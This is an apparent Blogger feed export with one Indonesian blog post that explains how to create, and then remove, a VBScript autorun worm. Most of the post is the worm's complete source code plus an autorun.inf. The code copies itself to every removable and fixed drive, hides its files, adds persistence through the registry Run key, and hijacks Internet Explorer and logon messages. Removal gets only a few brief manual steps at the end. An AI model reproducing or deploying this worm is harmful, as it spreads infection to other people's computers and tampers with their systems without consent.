<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8535122607067057015</id><updated>2012-02-16T16:34:44.450-08:00</updated><title type='text'>cybernet</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://windowstrik.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8535122607067057015/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://windowstrik.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>adynet</name><uri>http://www.blogger.com/profile/04040316574299983335</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>1</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8535122607067057015.post-6057840907662989565</id><published>2008-11-10T20:30:00.000-08:00</published><updated>2008-11-10T20:32:56.885-08:00</updated><title type='text'>Membuat dan Menghapus Virus Autorun tanpa Antivirus</title><content type='html'>Artikel ini berguna untuk melengkapi artikel sebelumnya, bahan yang digunakan sebagai sampel virus ini yaitu virus dengan nama k4l0n6 yang telah menginfeksi PC gw. Adapun cara membuat virus autorun sebagai berikut:1. script coding pertama[autorun]&lt;br /&gt;shellexecute=wscript.exe k4l0n6.sys.vbs&lt;br /&gt;&lt;br /&gt;simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda petik)&lt;br /&gt;&lt;br /&gt;2. script coding kedua&lt;br /&gt;‘Kalong-X2&lt;br /&gt;‘Varian dari Kalong.VBS&lt;br /&gt;on error resume next&lt;br /&gt;&lt;br /&gt;‘Dim kata-kata berikut&lt;br /&gt;dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,kalong,nt,check,sd&lt;br /&gt;&lt;br /&gt;’siapkan isi autorun&lt;br /&gt;isi = “[autorun]” &amp;amp; vbcrlf &amp;amp; “shellexecute=wscript.exe k4l0n6.sys.vbs”&lt;br /&gt;set longka = createobject(”Scripting.FileSystemObject”)&lt;br /&gt;set mf = longka.getfile(Wscript.ScriptFullname)&lt;br /&gt;dim text,size&lt;br /&gt;size = mf.size&lt;br /&gt;check = mf.drive.drivetype&lt;br /&gt;set text = mf.openastextstream(1,-2)&lt;br /&gt;do while not text.atendofstream&lt;br /&gt;rekur = rekur &amp;amp; text.readline&lt;br /&gt;rekur = rekur &amp;amp; vbcrlf&lt;br /&gt;loop&lt;br /&gt;do&lt;br /&gt;&lt;br /&gt;‘buat file induk&lt;br /&gt;Set windowpath = longka.getspecialfolder(0)&lt;br /&gt;Set syspath = longka.getspecialfolder(1)&lt;br /&gt;set tf = longka.getfile(syspath &amp;amp; “\recycle.vbs”)&lt;br /&gt;tf.attributes = 32&lt;br /&gt;set tf = longka.createtextfile(syspath &amp;amp; “\recycle.vbs”,2,true)&lt;br /&gt;tf.write rekur&lt;br /&gt;tf.close&lt;br /&gt;set tf = longka.getfile(syspath &amp;amp; “\recycle.vbs”)&lt;br /&gt;tf.attributes = 39&lt;br /&gt;&lt;br /&gt;’sebar ke removable disc ditambahkan dengan Autorun.inf&lt;br /&gt;for each desades in longka.drives&lt;br /&gt;&lt;br /&gt;If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path &lt;&gt; “A:” then&lt;br /&gt;&lt;br /&gt;set tf=longka.getfile(desades.path &amp;amp;”\k4l0n6.sys.vbs”)&lt;br /&gt;tf.attributes =32&lt;br /&gt;set tf=longka.createtextfile(desades.path &amp;amp;”\k4l0n6.sys.vbs”,2,true)&lt;br /&gt;tf.write rekur&lt;br /&gt;tf.close&lt;br /&gt;set tf=longka.getfile(desades.path &amp;amp;”\k4l0n6.sys.vbs”)&lt;br /&gt;tf.attributes = 39&lt;br /&gt;&lt;br /&gt;set tf =longka.getfile(desades.path &amp;amp;”\autorun.inf”)&lt;br /&gt;tf.attributes = 32&lt;br /&gt;set tf=longka.createtextfile(desades.path &amp;amp;”\autorun.inf”,2,true)&lt;br /&gt;tf.write isi&lt;br /&gt;tf.close&lt;br /&gt;set tf = longka.getfile(desades.path &amp;amp;”\autorun.inf”)&lt;br /&gt;tf.attributes=39&lt;br /&gt;end if&lt;br /&gt;next&lt;br /&gt;&lt;br /&gt;‘Manipulasi Registry&lt;br /&gt;set kalong = createobject(”WScript.Shell”)&lt;br /&gt;&lt;br /&gt;‘Ubah IE Title&lt;br /&gt;kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: X2 ATTACK ::”&lt;br /&gt;&lt;br /&gt;‘Ubah tulisan pertama pada text box menu RUN&lt;br /&gt;kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “KALONG-X2/1?&lt;br /&gt;kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”&lt;br /&gt;&lt;br /&gt;‘Buat pesan saat Windows Startup&lt;br /&gt;kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “KALONG-X2?&lt;br /&gt;kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Komputer Anda Diambil Alih”&lt;br /&gt;&lt;br /&gt;‘Aktifkan saat Windows Startup&lt;br /&gt;kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath &amp;amp; “\recycle.vbs”&lt;br /&gt;&lt;br /&gt;‘Ubah Default Start Page Internet Explorer&lt;br /&gt;kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.vaksin.com”&lt;br /&gt;&lt;br /&gt;‘Bonus&lt;br /&gt;if check &lt;&gt; 1 then&lt;br /&gt;Wscript.sleep 200000&lt;br /&gt;end if&lt;br /&gt;loop while check &lt;&gt; 1&lt;br /&gt;set sd = createobject(”Wscript.shell”)&lt;br /&gt;sd.run windowpath &amp;amp; “\explorer.exe /e,/select, ” &amp;amp; Wscript.ScriptFullname&lt;br /&gt;&lt;br /&gt;simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa tanda petik)&lt;br /&gt;&lt;br /&gt;secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi komputer yang kita gunakan. Untuk mengetahui komputer terkena virus autorun dapat menggunakan software iKnowPS sehingga akan terlihat frekuensi tampilan kerja komputer yang terlihat sangat sibuk.&lt;br /&gt;&lt;br /&gt;Adapun cara menanggulangi virus tersebut yaitu dengan cara&lt;br /&gt;&lt;br /&gt;- tekan menu Tools &gt; Folder Options… &gt; View &gt; unchek Hide Protected operating system files (Recommended) &gt; yes &gt; OK&lt;br /&gt;&lt;br /&gt;- sehingga secara otomatis akan terlihat tampilan file virus yang terhidden tersebut&lt;br /&gt;- langkah selanjutnya yaitu dengan cara membuka dan mempelajari script coding file virus tersebut. Dan mempelajari bagian-bagian mana saja yang settingannya dirubah, terutama pada register editor (menu run &gt; ketik regedit &gt; OK)&lt;br /&gt;&lt;br /&gt;- setelah itu, file tersebut dihapus/di delete dari komputer&lt;br /&gt;&lt;br /&gt;semoga tulisan ini, bisa bermanfaat dan berguna untuk semua orang&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8535122607067057015-6057840907662989565?l=windowstrik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://windowstrik.blogspot.com/feeds/6057840907662989565/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8535122607067057015&amp;postID=6057840907662989565' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8535122607067057015/posts/default/6057840907662989565'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8535122607067057015/posts/default/6057840907662989565'/><link rel='alternate' type='text/html' href='http://windowstrik.blogspot.com/2008/11/membuat-dan-menghapus-virus-autorun.html' title='Membuat dan Menghapus Virus Autorun tanpa Antivirus'/><author><name>adynet</name><uri>http://www.blogger.com/profile/04040316574299983335</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
